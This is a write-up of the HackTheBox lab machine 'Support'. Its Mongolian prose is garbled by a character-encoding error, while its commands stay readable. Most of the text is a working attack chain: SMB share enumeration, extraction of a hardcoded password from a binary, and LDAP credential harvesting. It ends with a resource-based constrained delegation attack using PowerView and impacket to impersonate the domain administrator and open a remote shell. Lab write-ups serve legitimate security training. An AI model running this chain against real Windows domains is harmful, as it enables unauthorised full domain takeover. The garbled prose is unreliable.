Page cover

๐Ÿค•Support

Kerberos Exploit, LDAP enumeration, Windows Fuzzing

ะ‘ะธ ะตั€ำฉะฝั…ะธะนะดำฉำฉ ั…ัƒั€ะดะฐะฝ ะผัะดััะปัะป ะพะปะถ ะฐะฒะฐั… ะทะพั€ะธะปะณะพะพั€ rustscan ะฐัˆะธะณะปะฐะถ ัะบะฐะฝะดะฐั… ะดัƒั€ั‚ะฐะน

rustscan -a support.htb --ulimit 5000 -b 2000

Open 10.10.11.174:53
Open 10.10.11.174:88
Open 10.10.11.174:135
Open 10.10.11.174:139
Open 10.10.11.174:389
Open 10.10.11.174:445
Open 10.10.11.174:464
Open 10.10.11.174:593
Open 10.10.11.174:636
Open 10.10.11.174:3269
Open 10.10.11.174:3268
Open 10.10.11.174:5985
Open 10.10.11.174:9389
Open 10.10.11.174:49664
Open 10.10.11.174:49668
Open 10.10.11.174:49670
Open 10.10.11.174:49675
Open 10.10.11.174:49699
Open 10.10.11.174:52273

445 ะฑัƒัŽัƒ SMB ะพะฝะณะพั€ั…ะพะน ะฑะฐะนัะฐะฝ ัƒั‡ั€ะฐะฐั smbclient-ะณ ะฐัˆะธะณะปะฐะถ share ะดะพั‚ะพั€ ะฑะฐะนะณะฐะฐ ั…ัั€ัะณะปัะณั‡ะดะธะนะฝ ะผัะดััะปะปะธะนะณ ะพะปะถ ะฐะฒัะฐะฝ

smbclient -L support.htb -N

Enumeration ั…ะธะนั…ัะด ะพะปะดัะพะฝ support-tools ั…ะฐะฒั‚ะฐัั‹ะณ ะฝัะผัะปั‚ััั€ ะพั€ัƒัƒะปะถ ะดะฐั…ะธะฝ ั…ะฐะฝะดะฐะปั‚ ั…ะธะนะถ าฏะทะฝั

smbclient //support.htb/support-tools -N

ะ•ั€ำฉะฝั…ะธะนะดำฉำฉ ะฑาฏั… ั„ะฐะนะปั‹ะณ ะฝัŒ mget * ะณัั… ะผัั‚ััั€ ั‚ะฐั‚ะฐะถ าฏะทััะฝ ะฑำฉะณำฉำฉะด UserInfo.exe.zip ะดะพั‚ะพั€ ะฝัƒัƒั† ะผัะดััะปะปาฏาฏะด ะฑะฐะนัะฐะฝ

Zip ั„ะฐะนะปั‹ะณ ะทะฐะดะปะฐะฐะด าฏะทะฒัะป ะดะพั‚ะพั€ ะฝัŒ UserInfo.exe ะฑัƒัŽัƒ Executable ัˆัƒัƒะด ะฐะถะธะปะปัƒัƒะปะฐั… ะฑะพะปะพะผะถั‚ะพะน ั„ะฐะนะป ะฑะฐะนะฒ

ะญะฝัั…าฏาฏ .exe ั„ะฐะนะปะฐะฐ ะทะฐะดะปะฐะฐะด าฏะทะฒัะป ะดะพั‚ะพั€ ะฝัŒ Protected , LDAPQuery ั…ัััะณั‚ getPassword, enc_password, key ะณัััะฝ ััะถะธะณั‚ัะน 3 ั…ัััะณ ั…ะฐั€ะฐะณะดะฐะฒ

enc_password ั…ััะณะธะนะณ ั…ะฐั€ะฒะฐะป ะดะพั‚ะพั€ ะฝัŒ ัะผะฐั€ ัˆะธั„ั€ะปัะปั‚ ะฝัŒ ะผัะดัะณะดัั…ะณาฏะน ัะพะฝะธะฝ ั‚ัะผะดัะณั‚าฏาฏะด ะฐะณัƒัƒะปัะฐะฝ ะฝัƒัƒั† าฏะณ ะฑะฐะนะฒ

private static string enc_password = "0Nv32PTwgYjzg9/8j5TbmvPd3e7WhtWWyuPsyO76/Y+U193E";

key ั…ััะณะธะนะณ ั…ะฐั€ะฒะฐะป ัˆะธั„ั€ะปัะปั‚ะธะนะฝ ั‚าฏะปั…าฏาฏั€ ะฑะฐะนั… ะฑำฉะณำฉำฉะด armando ะณัะดัะณ string ั‚ำฉั€ำฉะปั‚ัะน ะฑะฐะนะฒ

ะขาฏะปั…าฏาฏั€ ะฝัŒ "armando"

ะžะฝะปะฐะนะฝะฐะฐั€ ั‚ะฐะนะปะฐั… ะณัะถ ะฝะธะปััะฝ าฏะทััะฝ ะฑะพะปะพะฒั‡ ะฐะผะถะธะปั‚ั‹ะณ ัั ะพะปัะพะฝ ัƒั‡ั€ะฐะฐั ัั…ะปััะด base64-ะพะพั€ ั‚ะฐะนะปะฐะฐะด ะฝัะณ ะฑาฏั€ั‡ะปัะฝ ะผะฐััะธะฒั‚ ั…ัƒะฒะฐะฐะถ ะฑะฐะนะณะฐะฐะด join ั…ะธะนะถ าฏะทัะฒ

ะฏะผะฐั€ ั‡ ะฑะฐะนัะฐะฝ human-readable ั‚ะตะบัั‚ ะณะฐั€ั‡ ะธั€ััะฝ ะฑำฉะณำฉำฉะด ัะฝัั…าฏาฏ าฏั€ ะดาฏะฝะณ ะฐัˆะธะณะปะฐะฐะด LDAP enumeration ั…ะธะนั… ะฑะพะปะพะผะถั‚ะพะน

Domain ะดะพั‚ั€ะพะพัะพะพ LDAPsearch ั…ะธะนะณััะด username-ะด ั…ะฐั€ะณะฐะปะทะฐั… ะฝัƒัƒั† าฏะณะธะนะณ ะพะปะพั… ะฑะพะปะพะผะถั‚ะพะน Ironside47pleasure40Watchful

Ironside47pleasure40Watchful

LDAP-ะฐะฐั ั…ัั€ัะณะปัะณั‡ะดะธะนะฝ ะฝัั€ะธะนะณ ั‚าฏาฏะถ ะฐะฒะฐะฐะด user.txt ั„ะฐะนะป ะฑะพะปะณะพะพะด ะฑะธะดะฝะธะน ะพะปัะพะฝ ะฝัƒัƒั† าฏะณั‚ัะน ะทำฉะฒ ั…ะฐั€ะณะฐะปะทะฐั… ะฝัั€ะธะนะณ ะพะปะฝะพ

username: support
finally got user.txt
New-MachineAccount -MachineAccount fg0x0 -Password $(ConvertTo-SecureString 'fg0x0' -AsPlainText -Force) -Verbose
Get-DomainComputer fg0x0
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1677581083-3380853377-188903654-5601)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Get-DomainComputer dc -Properties 'msds-allowedtoactonbehalfofotheridentity'

impacket ะฐัˆะธะณะปะฐะฐะด kerberos ticket าฏาฏัะณัั… ะฑะพะปะพะผะถั‚ะพะน ั…ะฐั€ะธะฝ าฏาฏัะณัั…ะดัั domain-ะณ /etc/hosts ะดะพั‚ั€ะพะพ ะฝัะผะถ ำฉะณำฉั…ำฉำฉ ะผะฐั€ั‚ะฒะฐะฐ

impacket-getST support.htb/fg0x0:fg0x0 -dc-ip support.htb -impersonate administrator -spn www/dc.support.htb

export KRB5CCNAME=administrator.ccache

impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k

Finally you got root privilege

Last updated